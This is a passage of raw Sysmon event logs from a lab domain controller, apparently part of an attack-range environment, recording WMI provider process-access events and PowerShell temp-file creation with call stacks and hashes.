16:53:44.920{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239148Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239147Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239146Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239145Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D98-603E-9DAA-00000000AD01}9756ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yspggyub.jzq.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002239132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D98-603E-A1AA-00000000AD01}9808ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_suz440eb.43z.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002239131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A4AA-00000000AD01}13336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-A4AA-00000000AD01}13336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.904{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 